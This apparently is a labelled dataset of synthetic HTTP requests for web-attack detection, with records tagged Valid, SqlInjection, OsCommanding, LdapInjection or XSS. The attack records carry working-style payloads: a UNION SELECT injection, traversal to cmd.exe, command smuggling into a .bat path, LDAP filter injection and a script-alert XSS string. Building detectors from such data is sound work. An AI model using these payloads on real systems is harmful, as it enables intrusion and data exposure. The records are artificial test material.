~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ntioxdRi8ajlaT=xPsidBnkymtaT2awtw&osaBu2hhuaiewys=4928439&hea=sh7Se7_Qbp&oore=htu&Ilblog38h0=isvhhmrslncSoj&i4=5430043&MBxo_VN=|Nni&ptlohlxdil0e0c=d7GZj@sbT7B&9lSxboot.iniCJaccess_logA=7555642&rymb=3469025

End - Id: 34780
Start - Id: 42022
class: SqlInjection
GET /nPdFmx_v/7gimsGunodf/r7atttdehvmnt/8BnuXLt7xtrt9e/esegeoesgYs/oAMFsnRD/.whereqZ/i0atTnvhgkIn1Ede/e0thPtTaEtore/cn.tiff?5xnscript=ie4xtfncdhonao&c5d99uueTarowa=e3eh9Lfdznaadbaf&beieO7e=%27++%29++UN%2F**%2FION+++++ALL+++++SEL%2F**%2FECT+%27meRtleild%27%2C6%2C1990%2C%27rv2mi%27%2C9++++FROM+++++sAlHovem++++WHERE+++++%28++%27%27%3D+%27&xhlonumeon=9uienu&oeemeocwltf=62832&aFexecmxqN-F7=et&qercIo2ddk=58818295&dropkAFiiN.U9g=tpaqelke5he20h&wxr=s.CRgqsCARp&YPmochavY=n%5Dio&aPsbmO=mfBi&miiteTigyfnan=12220&vbscriptNAlinkB=el.T7KH&tl4pso=%29sbaae+aed HTTP/1.0
Host: www.vi2kn.gov
Connection: iuTbu1h
Accept: video/*;q=0.7, image/*;q=0.9, video/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hdsiiD-co44E;q=0.4
Cache-Control: min-fresh=97
Client-ip: 144.52.64.113
Cookie: WGObprocessing-instructionIS.Rl=qfnzmc;1ihOssneeac=ov3@;n4oslt=ireaitidi;KhtaccesxyCJ=$oH 
Cookie2: $Version="334"
Date: Thu, 02 Jul 09 18:00:50 GMT
ETag: "xrVUfSsUKUujhJHXyI"
Expect: ouiSlPr
From: eliqs@octere.st
If-Modified-Since: Wed, 08 Mar 06 19:03:20 UTC
If-Unmodified-Since: Sat, 31 Dec 05 10:00:25 CET
If-Match: *
If-None-Match: "ET5za89pIK5.DkzGsT6V"
If-Range: *
Max-Forwards: 0
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: iaijaB rjera=cnidom
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: http://bdxDh.de/Iea3/tmlrbd/nosm5r9/hasO.mpeg
TE: trailers,gzip;q=0.0
Trailer: Date
User-Agent: Mozilla/4.5 (Machintosh; U; PPC Mac OS X 8.3; ad-sy; rv:3.7.0) Gecko/96270803
UA-CPU: 68000
UA-Disp: 7502,392,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0057x268
Via: FTP/3.9 www.8tss9hn.jpeg, 8.5 9.206.170.243
Transfer-Encoding: deflate
Upgrade: tomgi/1.4, rQn9a/6.1, etcrc/1.8
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42022
Start - Id: 23430
class: Valid
GET /rn4ZW.i/nmx@oC.Hb/8KD8hzR/txeJShVb.ye/eiDdiEb9inael/5si.jpeg?e7p0=53134298&heiiutiwee=3409&pa9m6tohdeajot=uiRnksceo&cOtOlaznl=n_LY6HuEIBp&CzMcRxwYw%u=c.._h7%40Z019&shnsahr7eosogc=zi9nne&e4te1iroe3=7586411509&66Rv-=rennetcat+TkedropevalI5aanr&ine=81016&fjQy8rrite=llhttpsimgte7d HTTP/1.1
Host: www.Toaeerp3ud.it
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 206.97.201.33
Cookie: Lrso9=32558;ma9nxnOet=49336002;rl=22657969;ds=7krga;ide=iV19Ya
Cookie2: $Version="4"
Date: Tue, 12 May 09 20:35:15 CET
ETag: W/"2x-LYzj6K6C@Mpoho"
Expect: 100-continue
From: ehartago@ioAsobn.st
If-Modified-Since: Sat, 03 Dec 05 08:14:55 CET
If-Unmodified-Since: Sat, 27 Jan 07 14:11:23 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 0.6
Pragma: 6fnenyna=s
Proxy-Authorization: Digest username="eru4bt"
Authorization: NTLM YWNlYmlzQWJhYmVhVHNFc3ltb29jNmNLY2FlbWdydWVuNzlyc2VhZ2F0aWl2WW0=
Range: -93638
Referer: http://ioptdqoq.com/tcAwtdno/huek.js
TE: chunked,trailers
Trailer: Via
User-Agent: tolirn (tXCw7i8UP; z9wX7UV)
UA-CPU: PowerPC
UA-Disp: 528,388,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5603x6061
Via: FTP/6.4 www.iea5ttsm.png
Transfer-Encoding: gzip
Upgrade: ewen/9.0, yzsq/2.6, dee/3.9
Warning: 102 www.Yyse.js:80166 "hcRiwea8jau2wriecj" "Sun, 01 Mar 09 11:33:23 UTC"
X-Forwarded-For: 247.130.186.48
X-Serial-Number: 15233843
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23430
Start - Id: 44305
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 186.51.175.178
Connection: intd
Accept: application/*, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: l6rSecgs=OTzspy
Client-ip: 18.62.79.179
Cookie: uiao=v:t;b9adtisiucnhSda=NtllargineEaha;ifbt=vr665oenrtneoYmt;eameb0ende=autoexecall;qvaPij=s o5a
Cookie2: $Version="16"
Date: Sat, 04 Oct 08 16:28:09 GMT
ETag: "z-wEaS4pP5@ex2B"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Fri, 24 Oct 08 09:28:15 GMT
If-Unmodified-Since: Fri, 27 Jul 07 17:40:40 GMT
If-Match: "8Qzcs0Ith50ujetsKzuz"
If-None-Match: *
If-Range: *
Max-Forwards: 208
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: NTLM dDljZDVuZEppbXBlbG55ZHJ0ZXVpdHU0aXJEbXVwc29heG90d0tQZ2VlZFc=
Range: 3-
Referer: /zib3/aqosoil/se2swx/cpl9hzhI/rwhoz96a.asp
TE: deflate,chunked,trailers
Trailer: Expect
User-Agent: nianprnoaw (dF1HLDV; eyHSOJWTOE; ieMrGkr; yWcx@5)
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 521x0746
Via: FTP/8.4 www.srniFmml.css:9907
Transfer-Encoding: identity
Upgrade: ott9i/7.1, tei/4.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44305
Start - Id: 13687
class: Valid
GET /granyenoon2/.s2cTsf@Mq8/org/nsemtcrg/o@jxfzdnBYrKc/tebntttznv4/ZallnonMCSWIYbgsound/ateini1m0wriwoumfcst/yhVEAun0Tyn.nsf?PKvvKwY_Vcopykor=55&gGxqmeta=f7emifunt&DIatgcb0tattx4=731481587&itimenKrnt=6 HTTP/1.0
Host: www.hait3stIs.org
Connection: Nazlt0it
Accept: video/*;q=0.1, application/*;q=0.9, text/plain;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 230.127.50.78
Cookie: annt1y=eEvs66zee-;Cnopiesv=0pQuV63S55V;sx3yeV=i\ne;zrlsjntieelaa4n=eBIep4
Cookie2: $Version="77"
Date: Fri, 16 Jul 04 04:04:52 CET
ETag: "r9hc6qc.ObpsPh1J"
Expect: 100-continue
From: scomrohe@oeti.fr
If-Modified-Since: Fri, 31 Oct 08 23:51:55 GMT
If-Unmodified-Since: Tue, 27 Apr 10 05:04:26 CET
If-Match: "6gfP-lFeoCkf.JIwVy"
If-None-Match: *
If-Range: Wed, 25 Jun 08 09:07:15 UTC
Max-Forwards: 27
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: s0oiHh O7Mzit=q03lD
Range: -922184,573-
Referer: /ifjttsi/vnsoTdht/spr8n/pbfa.asp
TE: trailers,trailers
Trailer: Authorization
User-Agent: hD5@Ddti4 http://www.to6ydo.net
UA-CPU: Sparc
UA-Disp: 2040,5971,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x935
Via: mp0u/0.9 www.tnfrwlen.htm, 8.6 112.187.22.59, 6.7 www.erg7s.css
Transfer-Encoding: deflate
Upgrade: ztst8/6.0, emn/7.0, die/9.5
Warning: 757 36.29.209.66 "rvr2" 
X-Forwarded-For: 145.31.187.12
X-Serial-Number: 1852790108043394492
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13687
Start - Id: 27881
class: Valid
GET /Aaeval2qE/h5-9Uhy6_18qd/peyIogetrie9es.html?eileej1eeTasi=b%2FE&tasnn=1o&5einueodno=mao%3A%5C1miail&rapfNweiTae=irp6ormMHsmrt4u&_AsystemM8AU=7077&rtkrlh3wrsindk=eDiddl&Sg5ounEeaeqitf=4807018&attaee=dhavingcprocessing-instructionttlh&Fuyst9wt=0954466890 HTTP/1.1
Host: 99.31.21.190:861
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, gzip;q=0.3, gzip;q=0.8, identity;q=0.3, compress
Accept-Language: *;q=0.7
Cache-Control: min-fresh=8992
Client-ip: 218.21.80.173
Cookie: zzmee1Ae=g3al84rDg7;4sh4eEgr6mt=90zd
Cookie2: $Version="9"
Date: Sun, 29 Mar 09 21:10:50 GMT
ETag: "3bi8TVg5_pidMUIy"
Expect: hdrtkeu
From: naOe@fsh5cXZ.uk
If-Modified-Since: Fri, 18 Sep 09 19:28:42 GMT
If-Unmodified-Since: Wed, 22 Dec 04 04:57:03 UTC
If-Match: *
If-None-Match: *
If-Range: "jnKp0NjIL.o8rQ4f3"
Max-Forwards: 9858
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM b0VoYXhubGVlYWZSdG5uZTdnQW4ydGl0Y3NobnIyZWVp
Authorization: NTLM dWVob1RzZWRuT0psUTBJdVRFYmxtbmthbmR6eGlzbmVsYWhobmRuZmhkZXlo
Range: 334528-3,129-5609,255074-1318
Referer: http://www.nmsra.st/dfha/rmeCtE/idigaa.jsp
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.5 (Machintosh; U; PPC 7.5; iN-nk; rv:3.4.2) Gecko/13165312
UA-CPU: x86
UA-Disp: 3738,726,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1335x4049
Via: 3.3 www.e3sgoc.jpg:13, HTTP/6.5 144.104.183.146:74534, FTP/5.1 www.xiix.shtml
Transfer-Encoding: deflate
Upgrade: nen/9.1, a8m/4.8, eeIy/6.6, o06on/8.4, 6jt5s/6.6
Warning: 179 www.snrm.css "8ebbnsessuhaeisimedl" 
X-Forwarded-For: 122.11.217.222
X-Serial-Number: 8614528725280
----: ----------
~~~~~: ~~~~~~~~~~

null

End - Id: 27881
Start - Id: 38284
class: LdapInjection
GET /eNDteetm0hnMnh/mxthwEdhoyvan/ey6d8xgctlfohkkEyda/t_Eb-Gqx4/ci@RBUHs/yDmor5zt4uiNaiu/Naelmhri3gGmia/TGt.jpeg?fPfb4rckq8OQ=dbHLqy&6-EQVwindow.open5L3update=ydhRVz&oJnRhrb=054316&OooiudwToa7iy=32436844&neidmmsifitnth=eieteikhet4n&Ldropunionib_f@PY=6665203&y1eto6a=%29%28+++%7C++++%28+cn%3D*o+++%27brien*+%29%28mail+%3D*o+++%27brien*+%29+ HTTP/1.0
Host: 154.197.205.43
Connection: bce8rne
Accept: */*
Accept-Charset: iso-8859-8-i
Accept-Encoding: deflate, gzip;q=0.7
Accept-Language: qscri9bs-e, hea-a9ur4Ery;q=0.6, be-pR5c
Cache-Control: max-age=8516
Client-ip: 28.240.67.92
Cookie: ghysawinmg=7;roC2om-7mBn.=6xGUa;illHaiduyhyamat=t?ri;ok5ro1t7esGv=8nE;a0yAd=hbij0e0ew7Oe7rsiap
Cookie2: $Version="09"
Date: Wed, 30 Dec 09 02:00:47 CET
ETag: W/"Bq3JVGm2RGFCrlvj"
Expect: 100-continue
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Fri, 04 Apr 08 05:16:45 GMT
If-Unmodified-Since: Wed, 30 Jul 08 21:12:25 CET
If-Match: *
If-None-Match: "6-q2N90f9zcQjfY"
If-Range: "GMQmSR@Mlmy3hla8I"
Max-Forwards: 941
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="mscm"
Authorization: giVs8 eeKeyt=oedhece
Range: 339-28315
Referer: http://Negi.net/efpsl/adfoesNc.asmx
TE: deflate,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: gabfTagkpeEis
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: 5.1 96.74.31.247, 6.3 www.OYhmh.js, 2.2 www.Fwenpd.html
Transfer-Encoding: deflate
Upgrade: segoo/3.8
Warning: 319 133.132.138.49 "aLcsnAauiahn" 
X-Forwarded-For: 192.211.108.16
X-Serial-Number: 96070226298978376
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38284
Start - Id: 23412
class: Valid
GET /qfB5A--Ob/wWxCuSg5/1ew/ye1aidphbeea3sadns/xz.QMT.PyjBrE8ycsp/wkBzp5lFdowlG-R2G/36n/ra2a.php? HTTP/1.0
Host: 166.29.239.73:2434
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-korean
Accept-Encoding: 
Accept-Language: b-nUgs, oeeTrer-ylssnr3i;q=0.5, btN-f;q=0.5, m9-gC9p83;q=0.0, rn-e;q=0.7
Cache-Control: no-store
Client-ip: 200.220.239.93
Cookie: iol9=rpe;et2oeon=3ie1iaweT8t;tiiwse0iss=location;r;FfDVaN58BeIa=4t2sbbeo3lnt6;ne8s0toNgwebpo=edtn
Cookie2: $Version="832"
Date: Thu, 22 Mar 07 08:37:22 GMT
ETag: "4GlJvF0PI@Dj9YXMxhp"
Expect: sase9
From: tyRbnd@shlch.st
If-Modified-Since: Thu, 08 Oct 09 24:33:17 GMT
If-Unmodified-Since: Mon, 26 Dec 05 18:53:33 CET
If-Match: "DmLYZ02MIu0goqrId"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 5.9
Pragma: cna1Gst='ao'
Proxy-Authorization: Basic dGFpaGNvOm82em0=
Authorization: Basic aG13ZXFuOm9yTXlEaWk=
Range: -14180
Referer: http://rbwl2hs.net/wrnEnsmd/thsc/57p0miei/ihsNwi.mpeg
TE: trailers,trailers,chunked
Trailer: Referer
User-Agent: nOtree7edu/7.9.6
UA-CPU: StrongARM
UA-Disp: 9336,5495,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 134x126
Via: FTP/4.9 www.iafdats.jpeg
Transfer-Encoding: identity
Upgrade: kesgoe/3.7, tce9/6.9, aee0w/7.2, iyu/0.2
Warning: 969 190.205.124.28:1921 "Alhersnix9ottat" 
X-Forwarded-For: 95.103.231.158
X-Serial-Number: 329196523
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23412
Start - Id: 28019
class: Valid
GET /0tltyJXyRIh-BzAv@M/ihianozeiuec/23lBdalionzms/mtV8.GsYYGtnJv3Ak0tq/tMSMtxmlJ3UocytcS/bKgYfGVWNwFC0NE2/mCx3tFq238/nrmxcg6rNroila/iMoheeOendt.shtml? HTTP/1.1
Host: www.0ensane.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: identity, identity, deflate, deflate, deflate
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 188.7.31.94
Cookie: eI=ds;ris=dt8yupdateledz3ossAor;dyceh0fifo=vcopyut;lO4ls6ghaact=r
Cookie2: $Version="9"
Date: Thu, 30 Jul 09 24:07:44 CET
ETag: "lczTiIcIZiFK5dSs"
Expect: 100-continue
From: gnfoD3ti@acjf.biz
If-Modified-Since: Tue, 05 Aug 08 14:13:54 CET
If-Unmodified-Since: Thu, 14 Dec 06 10:52:22 GMT
If-Match: "hUMn9o0GuouF8yJi"
If-None-Match: "kW_AC5eSXvX_mO7ea1-t"
If-Range: Thu, 02 Dec 04 22:49:50 UTC
Max-Forwards: 9086
MIME-Version: 5.7
Pragma: tqro7=cp
Proxy-Authorization: NTLM QTRjYWFhd3RhNHlnT2l0aWNvaWkxc3JoVG9ndGFhaWRscjhySGF0aG90
Authorization: uqd1da truUi=h5nc
Range: 423138-8,594351-,3-756362
Referer: /kehseb/wctE/Tlge9e0/ajtadbwt.gif
TE: deflate,chunked,trailers
Trailer: Max-Forwards
User-Agent: drisSy http://www.saNe.fr
UA-CPU: x86
UA-Disp: 6297,097,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4477x7117
Via: 7.5 102.49.110.164, FTP/0.3 239.41.226.72, ldar/8.0 www.tnctuuai.png
Transfer-Encoding: emot3
Upgrade: 9htud/6.5, uadanh/4.9, euxd/5.9
Warning: 136 157.140.241.213 "esebndoextl" 
X-Forwarded-For: 83.205.211.13
X-Serial-Number: 45504056220
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28019
Start - Id: 21037
class: Valid
GET /nOx_HT4uOLk.g/73Kog0zY5EQd5nW.X3R/Nsumoefkas4rtw/hs6E.js? HTTP/1.1
Host: www.rNt9c.biz
Connection: neaxdtfo
Accept: */*;q=0.2
Accept-Charset: koi8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: xj7h=aDdm0i
Client-ip: 7.237.11.250
Cookie: eaotp=0c no
Cookie2: $Version="481"
Date: Fri, 05 Jan 07 11:49:16 GMT
ETag: "GPGx2RribCMdT4IUlLlp"
Expect: epese=5Pnfa
From: hrtiet@tsotaco.it
If-Modified-Since: Sun, 27 Mar 05 22:08:01 UTC
If-Unmodified-Since: Mon, 15 Jan 07 10:17:42 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 17 Dec 09 17:02:24 UTC
Max-Forwards: 7
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: NTLM ZHQ2cGx5MXljY2RvaXM0dDdTR2V0cnNhb2FNMTNpc250eGU=
Range: 98-,136-
Referer: http://www.2lteooa.it/dfss/nto9enE/sjlnZuft.css
TE: deflate
Trailer: If-Modified-Since
User-Agent: phqsfb-QRT http://www.En7t.org
UA-CPU: 68000
UA-Disp: 1375,066,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 985x390
Via: FTP/7.4 www.hilta.png, 9.6 www.ziten.png, 5.7 176.134.64.65
Transfer-Encoding: gzip
Upgrade: stlms2/7.1
Warning: 840 www.nusetr.jpg "slnpcuh" 
X-Forwarded-For: 120.235.145.125
X-Serial-Number: 650978480578430420
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21037
Start - Id: 17857
class: Valid
GET /2f@zKY/tRrsc4iqlmhhdteAs74f/fV.bin?rel=11&hscK=rcp&@ZINMJ=mqnQ%40x6&SengpH=21 HTTP/1.1
Host: www.bnsLenjoet.be
Connection: close
Accept: */*
Accept-Charset: utf-7, windows-1250
Accept-Encoding: *;q=0.1
Accept-Language: rDf-Iriraiie, iitx-rwur0dx2
Cache-Control: oia=ioa
Client-ip: 163.61.246.157
Cookie: FPkET8KpassthrubinL=7deh;annu=mmn;eshatcemQ=eemn0;ovTm=481;ma2nrFe203iPa=6277875
Cookie2: $Version="778"
Date: Wed, 26 Jan 05 18:28:52 CET
ETag: "jv2bocDD-zS@V6mm"
Expect: 100-continue
From: temygise@hhgs.com
If-Modified-Since: Sat, 06 Jan 07 15:09:18 GMT
If-Unmodified-Since: Mon, 24 Sep 07 20:03:41 GMT
If-Match: "sBBhDu6kAK2uS.RvVN"
If-None-Match: *
If-Range: Mon, 05 Apr 04 16:04:49 UTC
Max-Forwards: 0768
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Nelt nsnat=ga8es
Authorization: Digest response="cbFD0E0B8f0A1401aEBeDCfDaD42dB45"
Range: 725825-,076271-,1-
Referer: /bOiiNqm9.jpg
TE: trailers,deflate;q=0.4,chunked;q=0.8
Trailer: Authorization
User-Agent: iirf4sU/4.3.7.2.9
UA-CPU: 68000
UA-Disp: 929,7380,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8176x316
Via: pYou/1.4 152.159.204.163, FTP/5.9 1.148.84.87
Transfer-Encoding: esni
Upgrade: s7ip/0.0, lnldA/0.8, arno/2.1, at1o/2.9, n08rs/5.0
Warning: 251 www.imAynCn2.html:1876 "wyu5ls5teb2nziefeO" 
X-Forwarded-For: 65.146.203.44
X-Serial-Number: 164483377111827
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17857
Start - Id: 47352
class: XSS
GET /exdrRw8aAenkTtua7/uY2O-/oYsWx.htm?S.Ose4b3fF-1=%3Cscript++++%3Ealert+%28%27ni9564teh.toml%27%29%3C%2Fscript%3E&s2=271&TvYqzH=htmgpPcrsp7u HTTP/1.0
Host: 0.241.46.203:08
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-turkish
Accept-Encoding: identity, identity, gzip;q=0.4
Accept-Language: *
Cache-Control: max-age=09
Client-ip: 158.76.70.248
Cookie: c8oysa=15685560;stpunwleEsz5ni=oienqektvt;drdt9nD=74456865;i6rub=337245;nrbe=fedrkao0atico
Cookie2: $Version="15"
Date: Sat, 21 Jul 07 10:26:28 UTC
ETag: "mIzAAV5Ptg5ejv@T"
Expect: gehsh=hohaf
From: KhcttS@4dsl.fr
If-Modified-Since: Sat, 01 May 10 01:57:35 CET
If-Unmodified-Since: Sun, 08 Jun 08 01:20:35 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Aug 04 20:23:07 UTC
Max-Forwards: 65
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM dHphWjZucnRldWFnZ1BpemFucm9kbXJlbmR0bGYxaGhkcjI=
Authorization: tzlma dsiixmto=lersh
Range: -066761,152-
Referer: http://www.HfNhee.fr/pbdb.doc
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/8.9 (X11; U; Linux i586 7.7; 5i-ae; rv:9.0.5) Gecko/38540069
UA-CPU: MIPS
UA-Disp: 2126,5333,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 781x9042
Via: emor/0.7 www.Cninesed.jpg, 6.3 www.oroh.shtml, 2.6 98.139.179.165
Transfer-Encoding: gzip
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 189 www.heie2TOp.tiff:44669 "batcacSuto0ta" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47352
Start - Id: 44319
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.0
Host: www.Imec.fr
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: shift_jis, x-mac-japanese, windows-1257;q=0.0, windows-1253;q=0.4, iso-8859-6;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 150.122.198.96
Cookie: 8ypeorhoretns=6;yPHphpscript=q8_IB;uimgbIxSNxhTV=29;9NHinnOFg=tB5
Cookie2: $Version="7"
Date: Thu, 23 Sep 04 09:35:00 CET
ETag: "8n0SdKaafzTrTySu-@"
Expect: 100-continue
From: ssaaei@srTei5is.de
If-Modified-Since: Wed, 14 Oct 09 06:49:02 UTC
If-Unmodified-Since: Mon, 28 Aug 06 01:36:39 UTC
If-Match: "LRG0pPP2XtqJ6AhBRLhw"
If-None-Match: "PBInhx31w7nxij-"
If-Range: *
Max-Forwards: 28
MIME-Version: 2.9
Pragma: dsrrEr0a='elsfeii'
Proxy-Authorization: Basic dHN0bnRhbzpuYXV2ZA==
Authorization: Digest response="1dFb11EaFADBAFa04b6C8a388edCDdc3"
Range: -2
Referer: /engmY/0NeMemii/eiedo0ns/el1gh.avi
TE: deflate,trailers
Trailer: If-None-Match
User-Agent: tdAlevuX http://www.eessYe.biz
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5984x276
Via: HTTP/7.9 25.123.36.239
Transfer-Encoding: compress
Upgrade: ott9i/7.1, tei/4.6
Warning: 477 www.oeiseg.css:177 "oNngqeeniilu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44319
Start - Id: 4557
class: Valid
POST /44CRXvarJDv3Bbgsound/1jrv2PGNH.7orform@U/cmQlsheH/o8oEvzS/yielthanhs41eep0Ecem/ihy6UUffgz/1Nx/PinhnteayeuaDleySne/7ZiFd8DYEVgH/kAezh3aahpttsherc/a8v0AWSr_O-UtIG_LQ/oA_d-w4xPjy9Xe6.mdb? HTTP/1.1
Content-Length: 165
Content-Language: 9Jhhvw,8
Content-Encoding: gzip
Content-Location: /rerajt/punrs/iietN3h/io4m.wmn
Content-MD5: YWx1ZjZlZXRmN3VzdWVhMA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Apr 07 18:38:57 UTC
Last-Modified: Wed, 09 Jul 08 06:17:09 GMT
Host: www.trcqotsqef.be:80
Connection: L7sr
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ce-It5;q=0.1, hdtgc-nsse, tv6bte-sTs;q=0.2, omuhcaah-ieeeadh
Cache-Control: eL=a
Client-ip: 168.83.155.128
Cookie: oxcaikartved=e9;G3elx=4eopxjtena3a;test7Qso=661832;MgtsjDclhi2s5=fiE
Cookie2: $Version="1"
Date: Fri, 28 Aug 09 21:00:59 CET
ETag: "xLyaQ.3agzdd7R3i82dq"
Expect: 100-continue
From: rsnydvh6@sezlefn.be
If-Modified-Since: Sun, 18 Jan 09 20:04:21 CET
If-Unmodified-Since: Tue, 22 Nov 05 02:51:30 UTC
If-Match: *
If-None-Match: "sh81O.O5K4oWuKX"
If-Range: *
Max-Forwards: 3556
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: uaahe i2mes2rD=Tlhhrotn
Authorization: Digest nc=CA1e9F6D
Range: 5-7
Referer: /cueo/eameug.msf
TE: deflate,trailers,gzip;q=0.8
Trailer: Expect
User-Agent: Mozilla/3.4 (Machintosh; U; PPC Mac OS X 3.2; 4w-ax; rv:5.7.7) Gecko/07635268
UA-CPU: MIPS
UA-Disp: 067,349,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 308x492
Via: 4.7 124.197.141.118, FTP/1.6 www.snorn.png
Transfer-Encoding: gzip
Upgrade: y3ba/9.8
Warning: 589 28.189.6.206 "nrrp" "Sun, 11 Sep 05 11:50:25 GMT"
X-Forwarded-For: 244.206.80.136
X-Serial-Number: 8388631449289131034
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

csosdrs=6960939437&t9e5=10533&nwlvarCvYz=621&MhNlsN9Bsp@F=12797&Jjb.m0a=e\cirlinkf&er0=m&euO=ae5Smbddotmirogs&eb=3190648&nicaMNmYnci=fIR0w7Jtpbd&efaPoneGead=ad.cdl

End - Id: 4557
Start - Id: 2018
class: Valid
GET /ls2qM3htpass@-.js?j0ecaitu8lp44ic=53&o7c0beAh=o6rgv2VuE_jL&sdHso63iirt=uJAgVLQDq_SC&burestdinoHH=720&eeu06ens=diegwnbxs&h0a7e63=18771&pr=9eee+to&ed=%3A+oo%3B-17d%40teGe&Eicsi=eMX9kdjirR&xtetyh4gAai=44808&Ih8=%2FftpRnmbn%27r1+tevalcbdrop&QiQo4=icaAode&r3vttrmd=671757001&levotTtvfi0l=oEtee4rnabkbvnyRny HTTP/1.1
Host: www.crSpic0m6.biz
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic, ks_c_5601-1987;q=0.4, iso-2022-kr;q=0.5
Accept-Encoding: compress
Accept-Language: arIh2-atipl;q=0.8, ivaeipw-e, y-smo
Cache-Control: only-if-cached
Client-ip: 30.211.1.172
Cookie: OMAp=arhbsie;eebinltiUg=87703614
Cookie2: $Version="867"
Date: Tue, 13 Dec 05 03:27:17 GMT
ETag: W/"B@X6mQUMS2BRlAFjR"
Expect: LrD9
From: fjsefeez@ottdepq.org
If-Modified-Since: Fri, 29 Apr 05 14:56:30 CET
If-Unmodified-Since: Sat, 17 May 08 01:41:14 GMT
If-Match: *
If-None-Match: *
If-Range: "MaLoq3BLo_q-jYK1I"
Max-Forwards: 39
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: hn5ri hitrai8=tiph1etc
Authorization: ascnx iarcea=rw4h
Range: 705982-,79-08776,-104383
Referer: http://asnqOndt.net/nat3mdsn/Cefsroon/eiai/caihte/hv9ndee.png
TE: chunked,gzip;q=0.1
Trailer: Upgrade
